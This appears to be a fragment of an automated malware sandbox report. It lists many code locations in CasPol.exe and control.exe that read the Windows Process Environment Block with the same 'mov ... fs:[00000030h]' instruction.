          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017A3540 mov eax, dword ptr fs:[00000030h]9_2_017A3540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172AD30 mov eax, dword ptr fs:[00000030h]9_2_0172AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01733D34 mov eax, dword ptr fs:[00000030h]9_2_01733D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F8D34 mov eax, dword ptr fs:[00000030h]9_2_017F8D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017AA537 mov eax, dword ptr fs:[00000030h]9_2_017AA537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01754D3B mov eax, dword ptr fs:[00000030h]9_2_01754D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01754D3B mov eax, dword ptr fs:[00000030h]9_2_01754D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01754D3B mov eax, dword ptr fs:[00000030h]9_2_01754D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059100 mov eax, dword ptr fs:[00000030h]11_2_01059100
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059100 mov eax, dword ptr fs:[00000030h]11_2_01059100
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059100 mov eax, dword ptr fs:[00000030h]11_2_01059100
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128D34 mov eax, dword ptr fs:[00000030h]11_2_01128D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01074120 mov eax, dword ptr fs:[00000030h]11_2_01074120
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01074120 mov eax, dword ptr fs:[00000030h]11_2_01074120
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01074120 mov eax, dword ptr fs:[00000030h]11_2_01074120
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01074120 mov eax, dword ptr fs:[00000030h]11_2_01074120
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01074120 mov ecx, dword ptr fs:[00000030h]11_2_01074120
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108513A mov eax, dword ptr fs:[00000030h]11_2_0108513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108513A mov eax, dword ptr fs:[00000030h]11_2_0108513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01063D34 mov eax, dword ptr fs:[00000030h]11_2_01063D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01084D3B mov eax, dword ptr fs:[00000030h]11_2_01084D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01084D3B mov eax, dword ptr fs:[00000030h]11_2_01084D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01084D3B mov eax, dword ptr fs:[00000030h]11_2_01084D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105AD30 mov eax, dword ptr fs:[00000030h]11_2_0105AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010DA537 mov eax, dword ptr fs:[00000030h]11_2_010DA537
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107B944 mov eax, dword ptr fs:[00000030h]11_2_0107B944
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107B944 mov eax, dword ptr fs:[00000030h]11_2_0107B944
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01093D43 mov eax, dword ptr fs:[00000030h]11_2_01093D43
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D3540 mov eax, dword ptr fs:[00000030h]11_2_010D3540
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01077D50 mov eax, dword ptr fs:[00000030h]11_2_01077D50
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105C962 mov eax, dword ptr fs:[00000030h]11_2_0105C962
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107C577 mov eax, dword ptr fs:[00000030h]11_2_0107C577
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107C577 mov eax, dword ptr fs:[00000030h]11_2_0107C577
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105B171 mov eax, dword ptr fs:[00000030h]11_2_0105B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105B171 mov eax, dword ptr fs:[00000030h]11_2_0105B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107C182 mov eax, dword ptr fs:[00000030h]11_2_0107C182
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A185 mov eax, dword ptr fs:[00000030h]11_2_0108A185
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01052D8A mov eax, dword ptr fs:[00000030h]11_2_01052D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01052D8A mov eax, dword ptr fs:[00000030h]11_2_01052D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01052D8A mov eax, dword ptr fs:[00000030h]11_2_01052D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01052D8A mov eax, dword ptr fs:[00000030h]11_2_01052D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01052D8A mov eax, dword ptr fs:[00000030h]11_2_01052D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108FD9B mov eax, dword ptr fs:[00000030h]11_2_0108FD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108FD9B mov eax, dword ptr fs:[00000030h]11_2_0108FD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010861A0 mov eax, dword ptr fs:[00000030h]11_2_010861A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010861A0 mov eax, dword ptr fs:[00000030h]11_2_010861A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010835A1 mov eax, dword ptr fs:[00000030h]11_2_010835A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D69A6 mov eax, dword ptr fs:[00000030h]11_2_010D69A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01081DB5 mov eax, dword ptr fs:[00000030h]11_2_01081DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01081DB5 mov eax, dword ptr fs:[00000030h]11_2_01081DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01081DB5 mov eax, dword ptr fs:[00000030h]11_2_01081DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01108DF1 mov eax, dword ptr fs:[00000030h]11_2_01108DF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105B1E1 mov eax, dword ptr fs:[00000030h]11_2_0105B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105B1E1 mov eax, dword ptr fs:[00000030h]11_2_0105B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105B1E1 mov eax, dword ptr fs:[00000030h]11_2_0105B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010E41E8 mov eax, dword ptr fs:[00000030h]11_2_010E41E8
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106D5E0 mov eax, dword ptr fs:[00000030h]11_2_0106D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106D5E0 mov eax, dword ptr fs:[00000030h]11_2_0106D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01124015 mov eax, dword ptr fs:[00000030h]11_2_01124015
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01124015 mov eax, dword ptr fs:[00000030h]11_2_01124015
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6C0A mov eax, dword ptr fs:[00000030h]11_2_010D6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6C0A mov eax, dword ptr fs:[00000030h]11_2_010D6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6C0A mov eax, dword ptr fs:[00000030h]11_2_010D6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6C0A mov eax, dword ptr fs:[00000030h]11_2_010D6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01111C06 mov eax, dword ptr fs:[00000030h]11_2_01111C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7016 mov eax, dword ptr fs:[00000030h]11_2_010D7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7016 mov eax, dword ptr fs:[00000030h]11_2_010D7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7016 mov eax, dword ptr fs:[00000030h]11_2_010D7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112740D mov eax, dword ptr fs:[00000030h]11_2_0112740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112740D mov eax, dword ptr fs:[00000030h]11_2_0112740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112740D mov eax, dword ptr fs:[00000030h]11_2_0112740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108BC2C mov eax, dword ptr fs:[00000030h]11_2_0108BC2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B02A mov eax, dword ptr fs:[00000030h]11_2_0106B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B02A mov eax, dword ptr fs:[00000030h]11_2_0106B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B02A mov eax, dword ptr fs:[00000030h]11_2_0106B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B02A mov eax, dword ptr fs:[00000030h]11_2_0106B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A44B mov eax, dword ptr fs:[00000030h]11_2_0108A44B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01070050 mov eax, dword ptr fs:[00000030h]11_2_01070050
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01070050 mov eax, dword ptr fs:[00000030h]11_2_01070050
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EC450 mov eax, dword ptr fs:[00000030h]11_2_010EC450
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EC450 mov eax, dword ptr fs:[00000030h]11_2_010EC450
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01112073 mov eax, dword ptr fs:[00000030h]11_2_01112073
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01121074 mov eax, dword ptr fs:[00000030h]11_2_01121074
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107746D mov eax, dword ptr fs:[00000030h]11_2_0107746D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059080 mov eax, dword ptr fs:[00000030h]11_2_01059080
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D3884 mov eax, dword ptr fs:[00000030h]11_2_010D3884
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D3884 mov eax, dword ptr fs:[00000030h]11_2_010D3884
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106849B mov eax, dword ptr fs:[00000030h]11_2_0106849B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010990AF mov eax, dword ptr fs:[00000030h]11_2_010990AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108F0BF mov ecx, dword ptr fs:[00000030h]11_2_0108F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108F0BF mov eax, dword ptr fs:[00000030h]11_2_0108F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108F0BF mov eax, dword ptr fs:[00000030h]11_2_0108F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128CD6 mov eax, dword ptr fs:[00000030h]11_2_01128CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov ecx, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_011114FB mov eax, dword ptr fs:[00000030h]11_2_011114FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6CF0 mov eax, dword ptr fs:[00000030h]11_2_010D6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6CF0 mov eax, dword ptr fs:[00000030h]11_2_010D6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6CF0 mov eax, dword ptr fs:[00000030h]11_2_010D6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A70E mov eax, dword ptr fs:[00000030h]11_2_0108A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A70E mov eax, dword ptr fs:[00000030h]11_2_0108A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0111131B mov eax, dword ptr fs:[00000030h]11_2_0111131B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107F716 mov eax, dword ptr fs:[00000030h]11_2_0107F716
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EFF10 mov eax, dword ptr fs:[00000030h]11_2_010EFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EFF10 mov eax, dword ptr fs:[00000030h]11_2_010EFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112070D mov eax, dword ptr fs:[00000030h]11_2_0112070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112070D mov eax, dword ptr fs:[00000030h]11_2_0112070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01054F2E mov eax, dword ptr fs:[00000030h]11_2_01054F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01054F2E mov eax, dword ptr fs:[00000030h]11_2_01054F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108E730 mov eax, dword ptr fs:[00000030h]11_2_0108E730
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105DB40 mov eax, dword ptr fs:[00000030h]11_2_0105DB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106EF40 mov eax, dword ptr fs:[00000030h]11_2_0106EF40
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128B58 mov eax, dword ptr fs:[00000030h]11_2_01128B58
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105F358 mov eax, dword ptr fs:[00000030h]11_2_0105F358
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105DB60 mov ecx, dword ptr fs:[00000030h]11_2_0105DB60
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106FF60 mov eax, dword ptr fs:[00000030h]11_2_0106FF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01083B7A mov eax, dword ptr fs:[00000030h]11_2_01083B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01083B7A mov eax, dword ptr fs:[00000030h]11_2_01083B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128F6A mov eax, dword ptr fs:[00000030h]11_2_01128F6A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01061B8F mov eax, dword ptr fs:[00000030h]11_2_01061B8F
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01061B8F mov eax, dword ptr fs:[00000030h]11_2_01061B8F
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110D380 mov ecx, dword ptr fs:[00000030h]11_2_0110D380
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01068794 mov eax, dword ptr fs:[00000030h]11_2_01068794
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108B390 mov eax, dword ptr fs:[00000030h]11_2_0108B390
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7794 mov eax, dword ptr fs:[00000030h]11_2_010D7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7794 mov eax, dword ptr fs:[00000030h]11_2_010D7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7794 mov eax, dword ptr fs:[00000030h]11_2_010D7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0111138A mov eax, dword ptr fs:[00000030h]11_2_0111138A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01125BA5 mov eax, dword ptr fs:[00000030h]11_2_01125BA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010937F5 mov eax, dword ptr fs:[00000030h]11_2_010937F5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105C600 mov eax, dword ptr fs:[00000030h]11_2_0105C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105C600 mov eax, dword ptr fs:[00000030h]11_2_0105C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105C600 mov eax, dword ptr fs:[00000030h]11_2_0105C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01088E00 mov eax, dword ptr fs:[00000030h]11_2_01088E00
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01068A0A mov eax, dword ptr fs:[00000030h]11_2_01068A0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105AA16 mov eax, dword ptr fs:[00000030h]11_2_0105AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105AA16 mov eax, dword ptr fs:[00000030h]11_2_0105AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A61C mov eax, dword ptr fs:[00000030h]11_2_0108A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A61C mov eax, dword ptr fs:[00000030h]11_2_0108A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01073A1C mov eax, dword ptr fs:[00000030h]11_2_01073A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105E620 mov eax, dword ptr fs:[00000030h]11_2_0105E620
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110FE3F mov eax, dword ptr fs:[00000030h]11_2_0110FE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059240 mov eax, dword ptr fs:[00000030h]11_2_01059240
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059240 mov eax, dword ptr fs:[00000030h]11_2_01059240
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059240 mov eax, dword ptr fs:[00000030h]11_2_01059240
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059240 mov eax, dword ptr fs:[00000030h]11_2_01059240
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010E4257 mov eax, dword ptr fs:[00000030h]11_2_010E4257
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106766D mov eax, dword ptr fs:[00000030h]11_2_0106766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110B260 mov eax, dword ptr fs:[00000030h]11_2_0110B260
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110B260 mov eax, dword ptr fs:[00000030h]11_2_0110B260
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128A62 mov eax, dword ptr fs:[00000030h]11_2_01128A62
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0109927A mov eax, dword ptr fs:[00000030h]11_2_0109927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EFE87 mov eax, dword ptr fs:[00000030h]11_2_010EFE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108D294 mov eax, dword ptr fs:[00000030h]11_2_0108D294
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108D294 mov eax, dword ptr fs:[00000030h]11_2_0108D294
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D46A7 mov eax, dword ptr fs:[00000030h]11_2_010D46A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106AAB0 mov eax, dword ptr fs:[00000030h]11_2_0106AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106AAB0 mov eax, dword ptr fs:[00000030h]11_2_0106AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01120EA5 mov eax, dword ptr fs:[00000030h]11_2_01120EA5
